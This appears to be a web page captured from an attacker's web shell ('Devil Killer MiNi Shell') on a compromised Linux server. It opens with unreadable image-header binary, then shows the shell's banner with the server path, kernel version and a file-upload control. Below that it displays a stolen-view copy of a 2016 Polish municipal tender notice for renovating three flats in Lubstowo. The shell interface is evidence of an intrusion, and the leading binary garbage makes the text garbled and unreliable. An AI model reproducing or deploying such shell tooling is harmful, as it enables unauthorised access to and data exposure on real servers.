JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160606/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160606/70795-N-2016.html

<p class="kh_header"><b>Nowy Staw: Remont trzech zasiedlonych lokali mieszkalnych przejętych po byłych PGR znajdujących się w trzech różnych budynkach mieszkalnych w miejscowości: Lubstowo 46A/1, Lubstowo 46C/2, Lubstowo 46D/1</b><br>
<b>Numer ogłoszenia: 70795 - 2016; data zamieszczenia: 06.06.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nowy Staw , ul. Bema 1, 82-230 Nowy Staw, woj. pomorskie, tel. 055 2715110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.nowystaw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont trzech zasiedlonych lokali mieszkalnych przejętych po byłych PGR znajdujących się w trzech różnych budynkach mieszkalnych w miejscowości: Lubstowo 46A/1, Lubstowo 46C/2, Lubstowo 46D/1.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest remont trzech zasiedlonych lokali mieszkalnych przejętych po byłych PGR znajdujących się w trzech różnych budynkach mieszkalnych w miejscowości Lubstowo.
Na przedmiot zamówienia składają się poniższe elementy:
1)remont lokalu mieszkalnego w miejscowości Lubstowo 46A/1,
2)remont lokalu mieszkalnego w miejscowości Lubstowo 46C/2,
2)remont lokalu mieszkalnego w miejscowości Lubstowo 46D/1.

Bliższe informacje dot. budynku w miejscowości Lubstowo 46A/1
Budynek murowany, wykonany w technologii tradycyjnej, parterowy z poddaszem użytkowym. Dach dwuspadowy, konstrukcji drewnianej, kryty eternitem. Obiekt niepodpiwniczony. W budynku znajdują się dwa lokale mieszkalne opracowanie obejmuje część budynku związaną z lokalem nr 1.
Właścicielem budynku jest Gmina Nowy Staw, ul. Bema 1, 82-230 Nowy Staw.

Budynek murowany z cegły na fundamentach ceglanych. Otynkowany. Ściany zewnętrzne z cegły. Więźba dachowa drewniana, pokrycie dachu - eternit. Wymalowania ścian farbami emulsyjnymi, wymalowania sufitów farbami emulsyjnymi, istniejące powłoki malarskie o różnych stopniach zużycia ze spękaniami                  i uszkodzeniami mechanicznymi. Stolarka drzwiowa mieszana - drzwi płytowe drewniane, większość malowana farbą olejną, w złym lub dostatecznym stanie technicznym o dużym stopniu zużycia. Struktura budowlana przedmiotowych kondygnacji ogólnie w średnim stanie. Na posadzkach pomieszczeń wykładziny rulonowe pcv oraz wykładziny dywanowe. Stan techniczny istniejących posadzek niezadowalający. Do remontu istniejące w budynku instalacje.
Obiekt wyposażony jest w poniższe instalacje:
- instalacja wodna z przyłącza do wodociągu wiejskiego,
- instalacja kanalizacyjna z odprowadzeniem do szczelnego zbiornika,
- instalacja elektryczna z przyłącza do linii napowietrznej.

Powierzchnia zabudowy (lokal nr 1): 44,42 m2
Kubatura (lokal nr 1):134,00 m3
Powierzchnia użytkowa (lokal nr 1): 51,28 m2
w tym:
- parter: 34,91 m2
- poddasze: 16,37 m2

Zakres prac remontowych:
1. Stan istniejący - demontaże i rozbiórki:
1 - zabezpieczenie istn. napowietrznego przyłącza energetycznego,
2 - rozbiórka istniejącego pokrycia dachowego,
3- demontaż istniejącego orynnowania i obróbek blacharskich połaci dachowej,
4 - demontaż istniejących rur spustowych,
5- demontaż istniejących łat z desek na więźbie dachowej,
6- rozbiórka istniejących kominów ceglanych do poziomu stropu nad parterem,
7- demontaż parapetów wewnętrznych,
8- demontaż parapetów zewnętrznych,
9- demontaż istniejącej, drewnianej stolarki okiennej,
10 - demontaż istniejącej, zewnętrznej stolarki drzwiowej,
11 - demontaż istniejącej, wewnętrznej stolarki drzwiowej,
12 - oczyszczenie istniejących rys i spękań ścian zewnętrznych,
13 - usunięcie istniejących powłok malarskich oraz odspojeń i rozwarstwień tynków na powierzchni ścian i sufitów,
14 - demontaż istniejącej instalacji wod-kan,
15 - demontaż istniejącej instalacji elektrycznej,
16 - rozbiórka pieców kaflowych.
2. Stan projektowany:
1 - wymurowanie i otynkowanie rozebranych uprzednio części kominów,
2 - wymiana deskowania, uzupełnienie ubytków, konserwacja biologiczna i p-poż.
istniejącej więźby dachowej,
3 - przygotowanie więźby dachowej pod montaż pokrycia,
4 - wykonanie obróbek blacharskich i orynnowania,
5- montaż projektowanego pokrycia dachowego (blachodachówka),
6 - montaż nowej instalacji odgromowej,
7 - montaż projektowanych rur spustowych,
8 - wzmacnianie lub naprawa drewnianych belek stropowych,
9 - wykonanie ocieplenia ścian i stropów,
10- montaż nowej stolarki okiennej,
11- montaż nowej, zewnętrznej stolarki drzwiowej,
12- montaż nowej, wewnętrznej stolarki drzwiowej,
13- montaż projektowanych parapetów wewnętrznych,
14- montaż projektowanych parapetów zewnętrznych z blachy ocynkowanej, lakierowanej,
15- przygotowanie powierzchni ścian i sufitów - zmycie, uzupełnienie ubytków w rysach, spękaniach, odspojeniach, zagruntowanie,
16- dwukrotne malowanie uprzednio przygotowanych powierzchni ścian i sufitów farbą akrylową,
17- wykonanie nowych schodów wewnętrznych,
18- wykonanie nowych podłóg i posadzek,
19- wykonie instalacji c.o. wraz z instalacją nowego pieca centralnego ogrzewania,
20- wymiana instalacji elektrycznej,
21- wymiana instalacji wod-kan z armaturą,
22- dwukrotne malowanie elewacji po uprzednim przygotowaniu podłoża,
23- remont istniejącego szamba o pojemności 5 m3.

Bliższe informacje dot. budynku w miejscowości Lubstowo 46C/2
Budynek murowany, wykonany w technologii tradycyjnej, parterowy z poddaszem użytkowym. Dach dwuspadowy, konstrukcji drewnianej, kryty eternitem. Obiekt niepodpiwniczony. W budynku znajdują się dwa lokale mieszkalne opracowanie obejmuje część budynku związaną z lokalem nr 2.
Właścicielem budynku jest Gmina Nowy Staw, ul. Bema 1, 82-230 Nowy Staw.

Budynek murowany z cegły na fundamentach ceglanych. Otynkowany. Ściany zewnętrzne z cegły. Więźba dachowa drewniana, pokrycie dachu- eternit. Wymalowania ścian farbami emulsyjnymi, wymalowania sufitów farbami emulsyjnymi, istniejące powłoki malarskie o różnych stopniach zużycia ze spękaniami                    i uszkodzeniami mechanicznymi. Stolarka drzwiowa mieszana - drzwi płytowe drewniane, większość malowana farbą olejną, w złym lub dostatecznym stanie technicznym o dużym stopniu zużycia. Struktura budowlana przedmiotowych kondygnacji ogólnie w średnim stanie. Na posadzkach pomieszczeń wykładziny rulonowe pcv oraz wykładziny dywanowe. Stan techniczny istniejących posadzek niezadowalający.
Obiekt wyposażony jest w poniższe instalacje:
- instalacja wodna z przyłącza do wodociągu wiejskiego,
- instalacja kanalizacyjna z odprowadzeniem do szczelnego zbiornika,
- instalacja elektryczna z przyłącza do linii napowietrznej.

Powierzchnia zabudowy (lokal nr 2):46,29 m2
Kubatura (lokal nr 2):132,80 m3
Powierzchnia użytkowa (lokal nr 1):50,70 m2
w tym:
- parter:34,48 m2
- poddasze:16,22 m2

Zakres prac remontowych:
1. Stan istniejący - demontaże i rozbiórki:
1 - zabezpieczenie istn. napowietrznego przyłącza energetycznego,
2 - rozbiórka istniejącego pokrycia dachowego,
3- demontaż istniejącego orynnowania i obróbek blacharskich połaci dachowej,
4 - demontaż istniejących rur spustowych,
5- demontaż istniejących łat z desek na więźbie dachowej,
6- demontaż parapetów zewnętrznych,
7- demontaż istniejącej, wewnętrznej stolarki drzwiowej,
8- oczyszczenie istniejących rys i spękań ścian zewnętrznych,
9- usunięcie istniejących powłok malarskich oraz odspojeń i rozwarstwień tynków na powierzchni ścian i sufitów.
2. Stan projektowany:
1 - wymiana deskowania, uzupełnienie ubytków, konserwacja biologiczna i p-poż. istniejącej więźby dachowej,
2 - przygotowanie więźby dachowej pod montaż pokrycia,
3- wykonanie obróbek blacharskich i orynnowania,
4- montaż projektowanego pokrycia dachowego (blachodachówka),
5- montaż nowej instalacji odgromowej,
6 - montaż projektowanych rur spustowych,
7 - wykonanie ocieplenia ścian i stropów,
8 - montaż nowej, wewnętrznej stolarki drzwiowej,
9 - montaż projektowanych parapetów zewnętrznych z blachy ocynkowanej, lakierowanej,
10- przygotowanie powierzchni ścian i sufitów - zmycie, uzupełnienie ubytków w rysach, spękaniach, odspojeniach, zagruntowanie,
11-dwukrotne malowanie uprzednio przygotowanych powierzchni ścian i sufitów farbą akrylową,
12- renowacja schodów wewnętrznych,
13- wykonanie nowych podłóg i posadzek,
14- dwukrotne malowanie elewacji po uprzednim przygotowaniu podłoża,.
15- remont istniejącego szamba o pojemności 5 m3.

Bliższe informacje dot. budynku w miejscowości Lubstowo 46D/1
Budynek murowany, wykonany w technologii tradycyjnej, parterowy z poddaszem użytkowym. Dach dwuspadowy, konstrukcji drewnianej, kryty eternitem. Obiekt podpiwniczony. W budynku znajdują się dwa lokale mieszkalne opracowanie obejmuje część budynku związaną z lokalem nr 1.
Właścicielem budynku jest Gmina Nowy Staw, ul. Bema 1, 82-230 Nowy Staw.

Budynek murowany z cegły na fundamentach ceglanych. Otynkowany. Ściany zewnętrzne z cegły. Więźba dachowa drewniana, pokrycie dachu - eternit. Wymalowania ścian farbami emulsyjnymi, wymalowania sufitów farbami emulsyjnymi, istniejące powłoki malarskie o różnych stopniach zużycia ze spękaniami                 i uszkodzeniami mechanicznymi. Stolarka drzwiowa mieszana - drzwi płytowe drewniane, większość malowana farbą olejną, w złym lub dostatecznym stanie technicznym o dużym stopniu zużycia. Struktura budowlana przedmiotowych kondygnacji ogólnie w średnim stanie. Na posadzkach pomieszczeń wykładziny rulonowe pcv oraz wykładziny dywanowe. Stan techniczny istniejących posadzek niezadowalający. Do remontu istniejące w budynku instalacje.
Obiekt wyposażony jest w poniższe instalacje:
- instalacja wodna z przyłącza do wodociągu wiejskiego,
- instalacja kanalizacyjna z odprowadzeniem do szczelnego zbiornika,
- instalacja elektryczna z przyłącza do linii napowietrznej.

Powierzchnia zabudowy (lokal nr 1):57,26 m2
Kubatura (lokal nr 1):158,00 m3
Powierzchnia użytkowa (lokal nr 1):60,70 m2
w tym:
- parter:41,75 m2
- poddasze:18,95 m2

Zakres prac remontowych:
1. Stan istniejący - demontaże i rozbiórki:
1 - zabezpieczenie istn. napowietrznego przyłącza energetycznego,
2 - rozbiórka istniejącego pokrycia dachowego,
3- demontaż istniejącego orynnowania i obróbek blacharskich połaci dachowej,
4 - demontaż istniejących rur spustowych,
5- demontaż istniejących łat z desek na więźbie dachowej,
6- rozbiórka istniejących kominów ceglanych do poziomu stropu nad parterem,
7- demontaż parapetów wewnętrznych,
8- demontaż parapetów zewnętrznych,
9- demontaż istniejącej, drewnianej stolarki okiennej,
10 - demontaż istniejącej, zewnętrznej stolarki drzwiowej,
11 - demontaż istniejącej, wewnętrznej stolarki drzwiowej,
12 - oczyszczenie istniejących rys i spękań ścian zewnętrznych,
13 - usunięcie istniejących powłok malarskich oraz odspojeń i rozwarstwień tynków na powierzchni ścian i sufitów,
14 - demontaż istniejącej instalacji wod-kan,
15 - demontaż istniejącej instalacji elektrycznej,
16 - rozbiórka pieców kaflowych.
2. Stan projektowany:
1 - wymurowanie i otynkowanie rozebranych uprzednio części kominów,
2 - wymiana deskowania, uzupełnienie ubytków, konserwacja biologiczna i p-poż istniejącej więźby dachowej,
3 - przygotowanie więźby dachowej pod montaż pokrycia,
4 - wykonanie obróbek blacharskich i orynnowania,
5 - montaż projektowanego pokrycia dachowego (blachodachówka),
6 - montaż nowej instalacji odgromowej,
7 - montaż projektowanych rur spustowych,
8 - wzmacnianie lub naprawa drewnianych belek stropowych,
9 - wykonanie ocieplenia ścian i stropów,
10- montaż nowej stolarki okiennej,
11- montaż nowej, zewnętrznej stolarki drzwiowej,
12- montaż nowej, wewnętrznej stolarki drzwiowej,
13- montaż projektowanych parapetów wewnętrznych,
14- montaż projektowanych parapetów zewnętrznych z blachy ocynkowanej, lakierowanej,
15- przygotowanie powierzchni ścian i sufitów - zmycie, uzupełnienie ubytków w rysach, spękaniach, odspojeniach, zagruntowanie,
16-dwukrotne malowanie uprzednio przygotowanych powierzchni ścian i sufitów farbą akrylową,
17- wykonanie renowacji schodów wewnętrznych,
18- wykonanie nowych podłóg i posadzek,
	19- wykonie instalacji c.o. wraz z instalacją nowego pieca centralnego ogrzewania,
20- wymiana instalacji elektrycznej,
21- wymiana instalacji wod-kan z armaturą,
22- dwukrotne malowanie elewacji po uprzednim przygotowaniu podłoża,
23- remont istniejącego szamba o pojemności 5 m3.

Szczegółowy zakres i opis przedmiotu zamówienia (OPZ) znajduje się w:
1) projektach architektoniczno-budowlanych:
	a) Część I OPZ - lokal mieszkalny w Lubstowo 46A/1,
	b) Część II OPZ - lokal mieszkalny w miejscowości Lubstowo 46C/2,
	c) Część III OPZ - lokal mieszkalny w miejscowości Lubstowo 46D/1,
2) przedmiarach: 
	a) Część IV OPZ - lokal mieszkalny w miejscowości Lubstowo 46A/1,
	b) Część V OPZ - lokal mieszkalny w miejscowości Lubstowo 46C/2,
	c) Część VI OPZ - lokal mieszkalny w miejscowości Lubstowo 46D/1,
3) specyfikacjach technicznych wykonania i odbioru robót budowlanych:
	a) Część VII OPZ - lokal mieszkalny w miejscowości Lubstowo 46A,
	b) Część VIII OPZ - lokal mieszkalny w miejscowości Lubstowo 46C/2,
	c) Część IX OPZ - lokal mieszkalny w miejscowości Lubstowo 46D/1..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 50% wartości zamówienia podstawowego, polegające na powtórzeniu tego samego rodzaju zamówień, zgodnie z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.26.26.90-4, 45.26.23.00-4, 45.26.25.22-6, 45.42.11.00-5, 45.26.11.00-5, 45.40.00.00-1, 45.44.30.00-4, 45.11.11.00-9, 45.44.21.90-5, 45.11.12.13-4, 45.11.12.20-6, 45.32.40.00-4, 45.21.11.00-0, 45.42.21.00-2, 45.41.00.00-4, 45.33.23.00-6, 45.33.22.00-5, 45.31.12.00-2, 45.23.24.60-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium. Wadium wnosi się przed upływem terminu składania ofert. 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 10 000,00 zł słownie: dziesięć tysięcy złotych 00/100.
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1) w pieniądzu, przelewem na rachunek bankowy nr 37 8300 0009 0002 5589 2000 0100 Powiślański Bank Spółdzielczy w Kwidzynie z adnotacją: wadium - przetarg nieograniczony: Remont trzech zasiedlonych lokali mieszkalnych przejętych po byłych PGR znajdujących się w trzech różnych budynkach mieszkalnych w miejscowości: Lubstowo,
2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3) w gwarancjach bankowych, 
4) w gwarancjach ubezpieczeniowych ,
5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 	275).
4. Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
5. Wadium wniesione w pieniądzu należy złożyć z odpowiednim wyprzedzeniem, tak aby wpłynęło ono na rachunek bankowy Zamawiającego przed upływem terminu składania ofert. Powyższe zalecenie wynika z czasu trwania rozliczeń międzybankowych. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.
6. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
7. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie.
8. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta / poręczyciela.
9. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.
10. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza.
11. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium niezwłocznie po wniesieniu zabezpieczenia należytego wykonania umowy  oraz zawarciu umowy.
12. Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
13. Zamawiający zatrzymuje wadium wraz z odsetkami, w przypadku wystąpienia przesłanek określonych w art. 46 ust. 4a i 5 ustawy Pzp.
14. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46 Prawa zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przepisy prawa nie nakładają obowiązku posiadania uprawnień do wykonywania działalności lub czynności stanowiących przedmiot niniejszego zamówienia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca posiada wiedzę i doświadczenie, a w szczególności wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zgodnie z zasadami sztuki budowlanej należycie wykonał: co najmniej dwie roboty budowlane odpowiadające swoim rodzajem przedmiotowi zamówienia tj. w zakresie remontu budynku mieszkalnego o wartości łącznie z podatkiem VAT nie mniejszą niż 100.000,00 zł (słownie: sto tysięcy złotych 00/100) brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca dysponuje osobami zapewniającymi realizację zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonania zamówienia, a przede wszystkim wykaże, że w wykonywaniu zamówienia uczestniczyć będzie co najmniej:
-  jedna osoba, która pełnić będzie obowiązki Kierownika Budowy, posiadająca 	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, a ponadto osoba ta posiada co najmniej 3-letnie doświadczenie zawodowe jako Kierownik Budowy;
- jedna osoba, która pełnić będzie obowiązki Kierownika Robót w specjalności 	instalacyjnej, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych, a ponadto osoba ta posiada co najmniej 3-letnie doświadczenie zawodowe jako Kierownik Budowy lub Kierownik Robót;      
- jedna osoba, która pełnić będzie obowiązki Kierownika Robót w specjalności 	instalacyjnej, posiadająca uprawnienia budowlane do kierowania robotami budowlanymi w zakresie instalacji elektrycznych, a ponadto osoba ta posiada co najmniej 3-letnie doświadczenie zawodowe jako Kierownik Budowy lub Kierownik Robót;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

